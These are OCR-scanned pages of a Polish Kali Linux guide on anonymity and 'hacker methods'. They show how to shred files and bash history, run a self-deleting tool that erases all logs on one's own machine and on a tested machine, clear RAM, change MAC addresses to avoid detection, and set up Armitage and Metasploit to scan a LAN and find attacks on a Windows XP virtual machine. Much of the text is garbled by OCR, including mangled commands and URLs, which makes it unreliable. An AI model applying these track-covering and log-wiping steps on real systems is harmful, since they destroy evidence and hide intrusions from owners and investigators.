Ishred: 
shred: 
jshred: 
ishrea: 
snred: 
snred: 
shred: 
shred: 
shred: 
shred: 
shred: 
shred: 
shred: 
shred: 
shred: 
shred; 


|krzysiekgkali :- /Pobi 


przebieg 1/4 (radom)... 
przebieg 2/4 (ramdom)... 
przebieg 3/4 (ramiom)... 
przebieg 4/4 (000000)... 
usuwanie 
przemianowany na 
przemianowany na 666 
: przemianowany na 
przemianowany na 000000060060600000000 
ARAAAGOGEORARGRAGGEGO : przemianowany na A00AARARAGGEGEGGGABA 
AARARERAGOGAGRRGGGA :_ przemianowany na OQQ000600AGARAGEGGA 
ARAAGGOGOGOGARARAGA : przemianowany na 00%0000666666G6GA 
RAAAGARAOOORRRAREA: przemianowany na OO00ANARRRAREGGO 
BRAAGEGOOOOOBBBH : przemianowany na BOEGOAOOUOHOWGRA 
BARAAGEGEGOOBGOH: przemianowany na GBEGOGAOUBKABAG 
BARAGAOOOOGRGBE: przemianowany na BGGGOOOBOBEBBA 
8BB6G6GGEGG6BE: przemianowany na 00006G68HEGH 

©B6666G6EEGBH: przemianowany na 600006688608 

080086666666: przemianowany na 00086666668 

0866666GGEE6: przemianowany na 0086666688 

8006066666: przemianowany na 000608688 

808866666: przemianowany na 00088688 

80888666: przemianowany na 0000088 

0000660: przemianowany na 000008 

000668: przemianowany na 00000 

00008: przemianowany na 0000 

0868: przemianowany na 008 

6806: przemianowany na 00 

88: przemianowany na © 

apache user enum 2.08.txt: skasowany 

raneś |] 


enun-2.0. txt; 
-enum-2.0.txt: 
-enum-2.0. txt; 
-enum-2.0. txt: 
-enum-2.0. txt: 


apache-use! - 
apache-use! - 
apache-user 
apache-user 
apache-user 


84 


Czyścimy historię Terminalu 

W systemach Linux zapisywana jest historia 
komend zatwierdzanych w Terminalu © - do- 
myślnie plik historii mieści 1000 ostatnich 
komend. Osoba, która uzyska dostęp do na- 


search -h 
sudo find / *proxychains* 
72 sudo find / -name "*proxychains*" 
73 sudo find / -name "*proxychains.conf*" 
74 qedit /etc/proxychains.conf 
75 sudo gedit /ctc/proxychains.conf 
mousepad /etc/proxychains.conf 
77 clear 
proxychains firefox 
history 
more -/.bash history 
81 history 
krzysiekGkaLli: -$ |] 


szego komputera, będzie mogła sprawdzić, 
jakie działania ostatnio wykonywaliśmy, a po- 
nieważ większość testów będziemy rozpo- 
czynać w Terminalu, będzie można odkryć, 
co próbowaliśmy osiągnąć. 

Historię sprawdzamy poleceniem history. 


1 Po wpisaniu polecenia echo $HISTSIZE 
zostanie wyświetlona liczba zapisanych 
linii komend w historii systemu 


krzysiekGkali:-$ echo $HISTSIZE 
1000 
krzysiekGkali:-$ JJ 


2: chcemy całkowicie zablokować logo- 
wanie wpisywanych komend, wystarczy 
wpisać polecenie export HISTSIZE=0, a na- 
stępnie ponownie uruchomić komputer 


krzysiekekali:-$ export HISTSIZE=0 
krzysiekGkali: -$ |] 


Jednak niezapisywanie historii od tego 
momentu i brak możliwości jej przejrze- 
nia może okazać się dla nas uciążliwy. Jeśli 
będziemy chcieli cofnąć tę zmianę, należy 
wpisać polecenie: export HISTSIZE=1000 
i ponownie uruchomić komputer. 
Z różnych względów lepszym rozwiązaniem 
może okazać się skorzystanie z omawianego 
poprzednio narzędzia shred do wyczyszcze- 
nia historii. 
Wystarczy wykonać polecenie: 
sudo shred -zu /home/[nazwa_uzytkow- 
nika]j/.bash_history 


Zautomatyzowane czyszczenie 

W systemie zapisywanych jest znacznie 
więcej różnego rodzaju logów, które mogą 
zdradzić nasze działania, zarówno na naszej 
maszynie, jak i na maszynie, na której wy- 
konujemy testy. Dlatego też warto korzystać 
z kompleksowego narzędzia, które zostało 
stworzone specjalnie do zacierania śladów 
- ChainSaw. Po jego uruchomieniu wyczysz- 
czone zostaną wszystkie logi, a na koniec 
program usunie sam siebie i ślady po sobie. 


92 history 


krzysiekEćkali:-$ sudo shred -zu /home/krzysiek/.bash history 
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krzysiekęgkali:-$ git clone htrps://github.com/Tnffinite/ChainSaw 
Cloning into 'ChainSaw'... 

remote: Enumerating objects: 27, done. 

remote: Counting objects: 100% (27/27), done. 

remote: Compressing objects: 188% (26/26), done. 

remote: Total 27 (delta 9), reused © (delta 0), pack-reused © 
Unpacking objects: 100% (27/27), done. 

krzysiekgkali:-$ 


W Terminalu wyko- 

nujemy polecenie 
git clone https:// 
sithub.com Inffinite/ 
ChainSaw 


2 Przechodzimy do folderu ChainsSaw Po poprawnym przejściu przez spraw- 
poleceniem ed ChainSaw i kopiujemy dzenie wymagań programu wpisujemy 
główny skrypt do lokalizacji /root polece- yes i wciskamy w celu wyczyszczenia 


niem sudo cp ChainSaw.py /root logów. 

rzysiekGkali:-$ cd ChainSaw 
krzysiek©kali:-/ChainSaw$ ls Po zakończeniu 
Antidote.py Chainsaw.py README.md rootl.png root2.png root3.png ś p 3 
rzysiekGkali:-/ChainSaw$ sudo cp ChainSaw.py /root usuwania pojawi 
krzysiekkali:-/ChainSaw$ się informacja o suk- 


: [+1 ALL your tracks have been erased. 
Teraz przechodzimy do folderu /root [+] Now ChainSaw will shred itself. 


i wykonujemy skrypt, wpisując polece- |[+] ;) 
nie sudo python ChainSaw.py ©. krzysiekGkali: /root$ 


krzysiekgkali:/root$ sudo python Chainsaw.py cesie i skrypt sam 
[+] You are root. > Ź ż 
[+] Checking whether ChainSaw has been stored in the root directory... siebie wykasuje 
[+] Chainsaw is stored in /root. Lets shred stuff. z naszego dysku 

Do you want to shred all loqs? (yes/no) >> 


Czyścimy RAM NZ WO su - root 


rootGkali:-+ sudo sync; echo 3 > /proc/sys/vm/drop caches 
rootekali:-4 


soby, które nie chcą pozosta- 
wiać absolutnie żadnych śla- opróżnia bufor systemu plików, a drop_ca- 
dów, mogą również czyścić pamięć RAM. | ches usuwa pamięć podręczną bez zatrzy- 
Da się z niej wyciągnąć pewne informacje | mywania jakiejkolwiek aplikacji czy też 
nawet po wyłączeniu komputera, choć jest | procesu. 
to skomplikowane. Aby całkowicie to unie- 


możliwić, wystarczy wykonać zaledwie Dodatkowo po wykonaniu tej komendy 
kilka komend. powinniśmy zaobserwować wzrost wol- 
nej pamięci RAM LI, 3 


Uruchamiamy Termi- 

nal, zmieniamy użyt- 
kownika na root i wpisu- 
jemy komendę sudo sync; 
echo 3 > /proc/sys/vm/ 
drop_caches 


krzysiekOkali: root 


8 stopped, 6 zombie 
%Cpu(s): 6,1 us, 68,6 sy, 6,6 ni, 99,9 id, 6,6 wa, 6,6 hi, 8,6 si, 8,6 st 
|M1B Mem : 7966,2 total, 6910,4 iree, A 403,5 used, 652,3 buff/cache 


|MiB Swap: 4094,6 total, 4094,06 iree, 8,6 used. 7266,6 avail Mem 


142 


. 
Tasks: 143 total, 1 running, sleeping, 


PID USER U s TIME+ COMMAND 
647 root 28 6 573716 88464 35796 5 1,1 8:89.67 Xorg 


Tak naprawdę są to |rasks: 147 totat, 1 running, 146 sleeping, 8 zombie 


8 stopped, 
sCpu(s): 08,6 us, 68,1 sy, 68,6 ni, 99,7 id, 6,2 wa, 6,6 hi, 6,6 si, 6,6 st 


: > 
dwa polecenia, które |wie mem : '7366,2 totat, (7406,6 frec,j:] 399,1 used, 166,5 buff/cache 
MiB Swap: 4094,60 total, 4094,68 free, 8,6 used. 7343,6 avail Mem 


wykonają się jedno po 


drugim. Komenda sync PID USER SHR_S CF MEM TIME+ COMMAND 
647 root 28 8 573716 88408 35886 S 1,1 :16.34 Xorq 
1885 krzysiek 20 6 509566 73596 40512 S 8,9  6:89.61 termina+ 
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Czyszczenie pamięci RAM 

przy wyłączaniu systemu 

Jeśli chcemy, aby pamięć RAM była czysz- 
czona za każdym razem, gdy wyłączamy 
system, wystarczy, że dodamy odpowiedni 
wpis w plikach systemowych. 

Po dodaniu naszego skryptu w popraw- 
nym miejscu będzie on wykonywany 
za każdym razem, gdy komputer będzie 
wyłączany. 


Tworzymy nowy plik w edytorze teksto- 
wym 0 nazwie K99[dowolna_nazwa] 


krzysiekGkali:-$ mousepad K99ramczysc 


Wpisujemy treść skryptu 

ł'!1/bin/bash 
echo "echo 3 > /proc/sys/vm/drop_caches” 
i zapisujemy plik. 


adam1l3zajacigmail.com 


jak zapewnić sobie prywatność w internecie 


*/homejkrzysiek/KY9ramczysc - Mousepad 


Plik Edycja Wyszukiwanie Widok Dokument Pomoc 


4! /bin/bash 


Jecho "echo 3 > /proc/sys/vm/drop_caches"]| 
| 


Nadajemy odpowiednie uprawnienia dla 
naszego pliku poprzez komendę sudo 
chmod 777 K99ramczysc ©. 


krzysiekGkali:-$ sudo chmod 777 K99czyscram 
[sudo] hasło użytkownika krzysick: 
krzysiekckali:-$ 


Przenosimy nasz plik do odpowiedniej 

lokalizacji - zatwierdzając komendę 
sudo mv K99ramczysc /etc/rc0.d/ 
K99ramczysc 


Od tej pory zawsze przy wyłączaniu sys- 
temu zostanie automatycznie wyczysz- 
czona pamięć RAM. 


|krzysiekekali:-$ sudo mv K99ramczysc /etc/rc6.d/K99ramczysc 


Crontab — automatyzujemy procesy 


w systemie 


darza się, że w trakcie pracy z systemem 

operacyjnym okazuje się, że musimy 
wykonywać ogromną ilość powtarzalnych 
zadań. 
W przypadku Kali Linuxa (oraz innych syste- 
mów z rodziny Linux) z pomocą przychodzi 
narzędzie cron oraz crontab. Jest to swe- 
go rodzaju harmonogram do wykonywania 
konkretnych komend i skryptów z okre- 
śloną częstotliwością lub przy określonych 
warunkach. 


abyśmy mogli skorzystać z zaawansowa- 
nych programów. Dobrym przykładem jest 
narzędzie TOR, które właśnie poznaliśmy. 
Jeśli będzie uruchamiane za każdym razem, 
gdy włączymy system, będziemy mogli od 
razu korzystać z programu proxychains lub 
anonsurf. 


Uruchamiamy Terminal i wykonujemy 
komendę sudo crontab -e ©, po chwili 
wpisujemy 1 i zatwierdzamy. 


Crontab to tabela programu 
cron, która ma specjalny 
format umożliwiający prostą 
edycję. 

W trakcie czytania rozdzia- 
łów tej książki poznaliśmy 
wiele narzędzi oraz usług, 
które muszą działać w tle, 


krzysiekckali:-$ sudo crontab -e 
[sudo] hasło użytkownika krzysiek: 
no crontab for root - using an empty one 


Select an editor. 
1. /bin/nano 
2. /usr/bin/vim.basic 
3. /usr/bin/vim.tiny 


To change later, run 'select-editor"' 
<---- easiest 


Choose 1-3 [1]: 1J] 
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ś For more information see the manual pages of crontab(5) and cron(8) 


ka 


śś m h dom mon dow command 


reboot service tor start|] 


25 linii 


[ Zapisano 


ac Pomoc O Zapisz Wyszukaj 
o Wyjdź jj Wczyt.pli Zastąp 


Przechodzimy na sam koniec pliku tek- 
stowego i w nowej linii dodajemy wpis 
reboot service tor start 6. Następnie za- 
pisujemy plik, wciskając (+(0) i zatwier- 
dzając klawiszem [tr]. Po wykonaniu edycji 
zamykamy Terminal. 


Utworzony przez nas wpis będzie przy 
każdym uruchomieniu systemu jednora- 
zowo uruchamiał usługę TOR. 


gĄ Wytnij Wyjustuj Bież.poz. 


Wstaw teksjfjqj Pisownia Do Linii 


Bez problemu możemy również dodać wpis, 
który będzie zmieniał nasz adres w sieci TOR 
co określony czas, na przykład co dwie godzi- 
ny. Taki wpis będzie wyglądał tak: 

0 */2 * * * service tor restart 

To zadanie będzie uruchamiane co dwie peł- 
ne godziny. 

Więcej informacji o tworzeniu wpisów 
w crontabie można uzyskać, wpisując w Ter- 
minalu polecenie man crontab 


Zmieniamy nasz adres MAC 


mieniając adres MAC, sprawimy, że nie 

będzie można powiązać naszej fizycznej 
karty sieciowej z adresem IP oraz logami zapi- 
sanymi na serwerze czy też hoście, z którym 
nawiązaliśmy połączenie. W tym celu wyko- 
rzystamy program macchanger. 
Jest to specjalny program, z którego możemy 
korzystać poprzez Terminal. Pozwala on na 
zmianę adresu MAC naszej karty sieciowej. 
Trzeba zmieniać adres MAC, zanim połączy- 
my się z siecią. Warto pamiętać, że zmiana 
adresu MAC co jakiś czas w trakcie pracy 
może zwiększyć nasze bezpieczeństwo, gdyż 
w sieci nasz komputer będzie widoczny jako 


$ ipa 
1: Lo: 


<LOOPBACK, UP, LOWER_UP> mtu 65536 qdisc noqueue 


nowe urządzenie. Więc nawet jeśli generu- 
jemy duży ruch, to gdy zostanie on rozbity 
na kilka adresów MAC, trudniej będzie nas 
wykryć. 

Uwaga! Adres MAC zmieniamy tylko wtedy, 
gdy nie jesteśmy połączeni z żadną siecią. 


Uruchamiamy Terminal, wpisujemy ko- 
u mendę ip a © i zatwierdzamy klawiszem 
. Pojawią się wszystkie interfejsy siecio- 
we naszego komputera. Jeśli korzystamy z sie- 
ci bezprzewodowej, interesuje nas szczegól- 
nie nazwa interfejsu wlan0 ©, w zależności 
od komputera cyfra może być inna. 


state UNKNOWN group default qlen 1000 


link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 


inet 127.0.0.1/8 scope host lo 
valid_lft forever preferred_lft forever 
inet6 ::1/128 scope host 
valid_lft forever preferred _lft forever 
2: etha: 


<BROADCAST ,MULTTCAST,UP,LOWER_UP> mtu 1580 qdisc pfifo_fast state UP group default qlen 1000 


link/ether 08:00:27:05:4c:15 brd ff:ff:ff:ff:ff:ff 
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute etho0 


valid_lft 86190sec preferred_lft 86190sec 

inet6 fe80: 
valid_lft forever preferred_lft forever 

3: wlanó: 


a00:27ff:fe05:4c15/64 scope link noprefixroute 


<NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000 


link/ether 0e:bc:98:6a:2b:f8 brd ff:ffzff:ff:ff:ff 
31 
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jak zapewnić sobie prywatność w internecie 


4 Następnie upewniamy się, czy dany in- 
Śa terfejs jest dezaktywowany, wpisując ko- 
mendę sudo ip link set dev wlanO down 6, 
i zatwierdzamy klawiszem (zit|. 


= ZZA oc 
:-$ sudo ip link set dev wlanQ down 
szw a | 


% Wpisujemy i zatwierdzamy komendę 
«9 macchanger -s wlan0 © (wlan0 jest na- 
szym przypisanym interfejsem odczytanym 
w kroku 1). Jeśli pojawi się adres MAC, to 
znaczy, że możemy przystąpić do jego zmiany. 


:-$ macchanger -s wlano 
Current MAC:  0e:bc:98:6a:2b:f8 (unknown) 
Permanent MAC: 18:d6:c7:0b:cc:b4 (unknown) 
SZM | 


EEEE JE CZWEEGZ EE ECKA ER CEIECE Z EJ EĘCE JE CWEECZ KCOKCKJ 


3: wlanQ: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 
link/ether 26:3c:af:6f:44:47 brd ff:ff:ff:ff:ff:ff 


>$1 


Możemy ręcznie wprowadzić nowy adres 

F MAC lub skorzystać z funkcji tworzenia lo- 
sowego adresu. Druga opcja jest znacznie szyb- 
sza. Wprowadzamy i zatwierdzamy komendę 
sudo macchanger -r wlanO ©. Pojawi się in- 
formacja o nowo przypisanym adresie MAC 


:-$ sudo macchanger -r wlanQ 
Current MAC: 


New MAC: 
-$H 


= Po zakończeniu procesu aktywujemy 
interfejs, wprowadzając i zatwierdzając 
komendę sudo ip link set dev wlanO up. 
Teraz możemy ponownie wpisać komendę 
ip a. Jak widać, nasze działania są 
skuteczne, ponieważ nasza karta ma 
zupełnie inny adres MAC 


JAK SPRAWDZIĆ ADRES MAC W PANELU ROUTERA 


Po zalogowaniu się do panelu administra- 
cyjnego routera (dane logowania powinny 
znajdować się na naklejce na obudowie) 
możemy sprawdzić listę aktualnie połą- 
czonych z nim urządzeń z podstawowymi 


IP, adres MAC, nazwa klienta. W przypad- 
ku routerów firmy Asus po zalogowaniu 
do panelu administracyjnego klikamy na 
NEMEEL Po chwili pojawi się lista wszyst- 
kich urządzeń, możemy na niej sprawdzić 


informacjami na ich temat, w tym adres 


adresy MAC. 
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czy też potwierdzimy konto PayPal. Dlatego 
też nie ma sensu ukrywać swojej tożsa- 
mości w internecie i logować się do tego 
typu usług. Możemy również przysporzyć 
sobie kłopotów, ponieważ banki mogą ze 
względów bezpieczeństwa blokować konta, 
do których następują logowania z różnych 
adresów IP w różnych krajach. 


Nie zmieniamy typu wykorzystywa- 

nej sieci w trakcie trwania jednej 
sesji 
Jeśli korzystamy z sieci TOR przez na 
przykład 30 minut i stwierdzamy, że 
pracuje ona zbyt wolno, a my chcemy 
szybciej obejrzeć jakiś materiał, choćby 
film, nie wyłączajmy nagle sieci TOR i nie 
zaczynajmy korzystać z witryn, do których 
przed chwilą mieliśmy dostęp. Przez takie 
działanie bardzo łatwo powiązać adresy IP 
i czasy dostępu do serwerów. Powinniśmy 
całkowicie zamknąć usługę TOR i prze- 
glądarkę i dopiero po chwili rozpocząć 
nową sesję. 


Nie przesyłamy wrażliwych danych 

bez ich zaszyfrowania 
Nigdy nie wiemy, czy ktoś nas nie 
szpieguje. Faktem jednak jest, że 
wszelkiego rodzaju informacje, które są 
wrażliwe lub szczególnie ważne, nigdy nie 
powinny być przesyłane przez internet bez 
wcześniejszego zaszyfrowania. Jeśli nie 
zamierzamy korzystać ze specjalnych 
narzędzi do szyfrowania, powinniśmy 
przynajmniej spakować przesyłane pliki 
do archiwum i zabezpieczyć je hasłem. 


SZYFROWANIE 


Do szyfrowania wiadomości e-mail 
warto wykorzystać program Thunder- 
bird wraz z dodatkiem Enigmail. 

A jeśli chcemy zabezpieczyć rozmowy 
ze znajomymi na urządzeniach mobil- 
nych, powinniśmy zacząć korzystać 
z komunikatora Signal. 


Nie jest to idealne rozwiązanie, ale za to 
szybkie, a jeśli ustawimy odpowiednio 
silne hasło, będzie ono nie do złamania 
przez zwykłych atakujących. 


Nie otwieramy nieznanych linków 

i plików 
Nigdy nie mamy pewności, czy otrzymany 
link prowadzi do prawdziwej strony, czy 
jest to pułapka prowadząca do zainfe- 
kowanej witryny, która wykorzystując 
specjalne skrypty, przechwyci naszą 
przeglądarkę lub zainstaluje programy 
typu malware. Podobne zagrożenie 
istnieje, gdy otwieramy nieznane pliki, 
które otrzymaliśmy e-mailem lub sami 
pobraliśmy z podejrzanych stron. 


Nie podajemy wrażliwych danych 

online 
Jeśli zależy nam na anonimowości, nie 
możemy podawać naszych danych na 
wielu stronach. Informacje takie jak wiek, 
data urodzenia, miejsce zamieszkania, 
ulubione zwierzę, drużyna, ksywka, hobby 
i inne tego typu z pozoru wydają się mało 
szkodliwe. Jednak w większości przypad- 
ków, gdy ktoś na przykład chce odzyskać 
hasło do jakiejś usługi, wystarczy, że poda 
właśnie tego typu dane. 


Nie stosujemy słabych haseł 

Generatory do łamania haseł wykorzy- 
stują informacje dotyczące danego użyt- 
kownika. Wystarczy, że atakujący pozna 
kilka podstawowych danych i będzie mógł 
złamać hasło większości mniej doświad- 
czonych użytkowników. Bardzo dużo osób 
używa jako hasła swojego imienia i roku 
urodzenia albo nazwy drużyny piłkarskiej. 
Pamiętajmy, że musimy zabezpieczać 
nasze konta silnymi hasłami, które nie 
będą podatne na tego typu „społeczno- 
ściowe” ataki. Silne hasło powinno mieć 
przynajmniej 12 znaków, na które składać 
się będzie przynajmniej jedna duża litera, 
cyfra i znak specjalny. 
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Jak obronić się 
przed przejęciem 


kontroli nad 
komputerem 


Jeden z najbardziej niebezpiecznych ataków to taki, który 
prowadzi do przejęcia całkowitej kontroli nad jakimś 
urządzeniem. Tego typu ataki są wykonywane przez 

internet oraz z sieci lokalnej. Ich skutki mogą być bardzo 
poważne, gdyż po przejęciu kontroli atakujący ma właściwie 
nieograniczone możliwości. Dlatego też bardzo ważne jest, aby 
wiedzieć, w jaki sposób możemy zostać zaatakowani i jak się 


bronić 


Ataki z internetu a ataki z sieci lokalnej 


N asz komputer jest narażony na różnego 
rodzaju ataki. 

Najczęściej możemy spotkać się z ataka- 
mi z internetu polegającymi na przesłaniu 
nam szkodliwego oprogramowania, które 
wykona złośliwy kod, umożliwiając zdalny 
dostęp do naszego komputera. W zdecydo- 
wanej większości takie ataki opierają się na 
tym, że ofiara sama uruchamia niebezpieczny 
plik, który pobrała z internetu lub otrzyma- 
ła w załączniku poprzez e-mail. Wystarczy 
chwila nieuwagi i możemy sami umożliwić 
atakującemu dostęp do naszego urządzenia. 
Ataki z poziomu sieci lokalnej są bardziej 
niebezpieczne. Mogą polegać na zdalnym 
ataku na określone usługi poprzez otwarte 
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porty na naszym urządzeniu. Jest też wię- 
cej możliwych scenariuszy lokalnych ata- 
ków, które stanowią duże zagrożenie dla 
bezpieczeństwa. 

Dlatego też tak ważne są opisywane w po- 
przednich rozdziałach metody ochrony przed 
złamaniem zabezpieczeń naszej domowej sie- 
ci Wi-Fi. Jeśli natomiast korzystamy z otwar- 
tych sieci, musimy liczyć się z ryzykiem i pró- 
bować obronić się przed atakami. 

Z tego rozdziału dowiemy się, jak wygląda 
tok myślowy atakującego i w jaki sposób 
może on przejąć kontrolę nad naszym urzą- 
dzeniem. Dzięki temu będziemy w stanie 
skutecznie się bronić. Dowiemy się też, na 
co musimy uważać. 
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Automatyczne sprawdzanie zabezpieczeń 


wietnym narzędziem, które pozwala na 
automatyczny audyt bezpieczeństwa 
(na podstawowym poziomie) naszej sieci, 
jest Armitage. Armitage składa się z wielu 
modułów, które pozwalają na skanowanie 
sieci, analizowanie szczegółów dotyczących 


hostów, sprawdzanie słabości oraz wyko- 
rzystywanie słabości. W dużej mierze jest 
nakładką graficzną na bardzo rozbudowany 
pakiet metasploit, który jest jednym z naj- 
ważniejszych narzędzi w systemie Kali Linux 
do wykonywania testów penetracyjnych. 


PRZYKŁADOWY ATAK W KILKU KROKACH 


Skanowanie / 
wyszukiwanie celów 


Zdalne 
wykonanie 


Wykorzystanie 
danych logowania 


Atak po stronie 
klienta 


Eskalacja uprawnień 
(zdobycie uprawnień | 
administratora) 


Zrzut hashy 
(haseł) 


Eksploracja systemu / 
wykradanie danych 


Utrzymywanie 
dostępu 


Armitage: sprawdzamy naszą sieć 


automatycznie 


4 anim zaczniemy w pełni korzystać z na- 
rzędzia Armitage, musimy wykonać 
wstępną konfigurację w systemie Kali Linux. 


Jednorazowa konfiguracja 
Ten proces będziemy musieli przejść tylko 
raz. Po jego wykonaniu Armitage będzie 


POZNAJ METODY HAKERÓW 91 


adam1i3zajacEgmail1.com 


jak obronić się przed przejęciem kontroli nad komputerem 


krzysiekEkali:-$ sudo ss -ant 
State Recv-Q Send-Q 

LISTEN © 128 

LISTEN © 128 

ESTAB o © 

ESTAB [) [) 

LISTEN © 128 
krzysiekGkali:-$ |] 


Local Address:Port 
0.0.0.0:8084 
127.6.6.1:5432 
192.168.1.108:37110 
192.168.1.108:53778 
[::1]:5432 


Peer Address:Port 
8.0.0.0:* 
0.0.0.0:* 

64.233.161.188:5228 
142.93.79.101:443 
[ESIES 


działał w naszym systemie bez 
większych problemów. 


Uruchamiamy Terminal i wpi- 
sujemy polecenie: 


krzysiekEkali:-$ sudo apt install armitage [.N 

Czytanie list pakietów... Gotowe 

Budowanie drzewa zależności 

Odczyt informacji o stanie... Gotowe 

Zostaną zainstalowane następujące NOWE pakiety: 
armitage 


sudo service postgresqi start ©. 
Zostanie uruchomiona usługa bazy danych. 


krzysiekekali:-$ sudo service postgresql start 
[sudo] hasło użytkownika krzysiek: 


Powinien pokazać się wpis o połą- 
czeniu z msf oraz o typie połączenia 
postgresql 


Sprawdzamy, czy PostgreSQL działa 

poprawnie, wpisując polecenie sudo ss 
-ant ©. Jeśli tak, to znajdziemy wpis LISTEN 
dla portu 5432. 


Następnie inicjalizujemy bazę danych dla 

programu metasploit, z którego korzy- 
sta Armitage. Wykonujemy komendę: sudo 
msfdb init ©. 


krzysiekEkali:-$ sudo msfdb init 

[i] Database already started 

[+] Creating database user 'msf' 

[+] Creating databases 'msf' 

[+] Creating databases 'msf_test' 

[+] Creating configuration file '/usr/| 
„ymt' 

[+] Creating initial database schema 


krzysiekGkali:-$ |] 


Teraz możemy sprawdzić, czy cały pro- 

ces przebiegł poprawnie. Wykonujemy 
polecenie sudo msfconsole, a następnie 
db_status 


Instalujemy Armitage - sudo apt install 
armitage [1. 


Uruchamiamy Armitage 
Po wstępnej konfiguracji możemy uruchomić 
Armitage. 


Uruchamiamy Terminal i wpisujemy 
polecenie: 
sudo service postgresql start 
(Ta usługa zawsze musi być uruchomiona 
przed Armitage). 


Następnie wykonujemy polecenie sudo 
armitage ©. 


krzysiekGćkali:-$ sudo armitage 


Pojawi się okno, w którym nawiązuje- 
my połączenie z bazą msf - klikamy na 
Connect [3. 


=[ metasploit v5.0.66-dev 


] 
+ -- --=[ 1956 exploits - 1092 auxiliary - 336 post ] 
+ -- --=[ 558 payloads - 45 encoders - 10 nops ] 
+ -- --=[ 7 evasion ] 


sf5 > db status 
[*] Connected to msf. Connection type: postgresql. 
msf5 > |] 
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Teraz możemy przystąpić do analizy bezpie- 


maz EYT czeństwa urządzeń wewnątrz naszej sieci 
lokalnej. Pamiętajmy, że takie testy możemy 

Port 95553 legalnie wykonywać tylko wtedy, gdy je- 

M Z steśmy administratorami lub właścicielami 
danej sieci. 

Pass c Poszczególne okna i obsługę programu po- 
znamy w trakcie wykonywania kolejnych 

BZZĆ == kroków. 
W kolejnym oknie klikamy na |= acks workspaces_ Help 


Yes © w celu uruchomienia spe- 
cjalnego serwera RPC. 


Start Metasplolt? 


A Metasplolt RPC server Is not running or 
not accepting connections yet. Would you 
like me to start Metasplolt's RPC server 
tor you? 


Po chwili pojawi się główne 
okno programu Armitage 


Szukamy urządzeń w sieci Armitage 


Zaczynamy od przeskanowania naszej _ szym przypadku jest to 192.186.1.111/24 
sieci lokalnej w poszukiwaniu urządzeń. i klikamy na OK. 
Klikamy na górnym pasku na Hosts, Nmap 
Scan, Quick Scan (0S detect) 


valid Lft forever 


link/ether 18:d6:c7:€| 
wo Enter scan range (e.g.. 192.168.1.0/24): inet 192.168.1.111/24 


192.160.1.111/24 


Armitage View Attacks Workspaces Help 


> (6 auxliary mport Hosts l 
+ (ii esplot | Add Hosts krzysiekókali:-$ 
» (© payload Nmap Scan 


scan 
Scan + UDP 
ntense $can, all TCP ports 


- (6 post 


MSF Scans. 


Po dłuższej chwili skanowanie zostanie 
zakończone i w górnym oknie zobaczymy 
wszystkie hosty EN (patrz następna strona), 
jakie zostały wykryte, wraz z przedstawioną 
graficznie informacją o ich typie (na przykład 
drukarka, system Windows, system Linux). 
Następnie w polu tekstowym podajemy _ W dolnym oknie [E-] znajdują się informacje 
dane naszej sieci lokalnej. Możemy podać _ o wykonywanym ostatnio zadaniu. Możemy 
adres naszego komputera z maską /24. W na-  tamteż skorzystać z wbudowanego Terminalu. 


DNS Enumerate 


Clear Database 
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4 Na potrzeby naszego testu uruchomione 

"SF zostały w sieci różne urządzenia, w tym 
dwie wirtualne maszyny - jedna z systemem 
Windows XP, a druga z zaktualizowanym sys- 
temem Windows 10. Maszyna z XP ma przy- 
pisany adres 192.168.1.113, a z Windows 10 
192.168.1.112 ©. 


Szukamy słabości automatycznie 


4 Po znalezieniu hostów klikamy na gór- 


: nym pasku na Attacks, Find Attacks 


Armitage vlew Hosts 


> [7 auxiliary 
-(G exploit 
> (5 payload 
> (6 post 


Po chwili do każdego celu zostaną wyszu- 
Śa kane różne możliwości ataku - klikamy 
na OK 


4% Dzięki temu możemy przeprowadzić 
«8 testowe ataki na wybrane maszyny - 
w najnowszej wersji programu ustawiony 
filtr wyszukiwania krytycznych podatności 
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automatycznie nie znajduje żadnych słabości 
dla systemu Windows 10 - jeśli jakaś się poja- 
wia, producent od razu wypuszcza stosowne 
aktualizacje. 


Attack Analysis Complete... 


You will now see an 'Attack' menu attached 
to each host in the Targets window. 


Happy hunting! 


W przypadku starszych systemów, jak Win- 
dows XP, Vista, 7, aktualizacje mogą nie 
pojawiać się tak szybko jak w przypadku 
Windows 10, dlatego właśnie zaleca się ko- 
rzystanie z najnowszego systemu operacyjne- 
go, który jest ciągle aktualizowany. 


adam1l3zajacigmail.com 


Sprawdzamy słabości konkretnych 


urządzeń ręcznie 


N iestety, Armitage może dawać wiele fał- 
szywych wyników lub nie sprawdzać 
wszystkich popularnych ataków. Zatem 
mimo że ma prosty w obsłudze interfejs, nie 
zawsze się sprawdza. Dlatego też warto prze- 
testować naszą sieć, korzystając z głównego 
narzędzia Metasploit. 


Wcześniej już zainicjowaliśmy bazę da- 
nych, więc teraz możemy od razu przystą- 
pić do korzystania z programu. Wykonujemy 
w Terminalu polecenie sudo service post- 
gresql start, a potem sudo msfconsole „A 


liwe metody ataku dla tego typu systemu. 
W Terminalu wpisujemy komendę: 
searchsploit Windows XP remote []. 


Wszystkich podatności jest bardzo wiele, 

dlatego też tylko zaawansowani testerzy 
będą wiedzieli, które ataki mogą dać efekt 
na jakich maszynach. W domowych warun- 
kach najlepszym wskaźnikiem tego, czy nasz 
system jest bezpieczny, jest skorzystanie z go- 
towych narzędzi do skanowania i wyszuki- 
wania zagrożeń. W konsoli msf wpisujemy 
polecenie: 


i 


rzysiekGkali:-$ sudo msfconsole 


+] Starting the Metasploit Framework consoLe... 


db_nmap -Pn -n -sV --script 
vuln [adres IP] 


Następnie uruchamiamy proste zada- 

nie skanowania, które pozwoli nam na 
sprawdzenie, czy msfconsole może korzy- 
stać z różnych modułów i bazy danych: 
db_nmap [adres IP lokalnej sieci]/24 -sn 


Pojawia się informacja: not vulnerable [] 
(patrz następna strona), co oznacza, że nasza 
maszyna jest bezpieczna. 

Opisywany przypadek to idealna sytuacja, 
gdy użytkownik ma wyłączone wszystkie 


=[ metasploit v5.0.67-dev 


7 evasion 


msf5 > db nmap 


msf5 > db nmap 192.168.1.111/24 -sn 


1957 exploits - 1090 auxiliary - 336 post 
558 payloads - 45 encoders - 160 nops 


[*] Usage: db nmap [--save | [--help | -h]] [nmap options] 


[*] Nmap: Starting Nmap 7.86 ( https://nmap.org ) at 2020-01-09 17:04 CET 


mm 


Teraz, na przykład wiedząc, że mamy do 


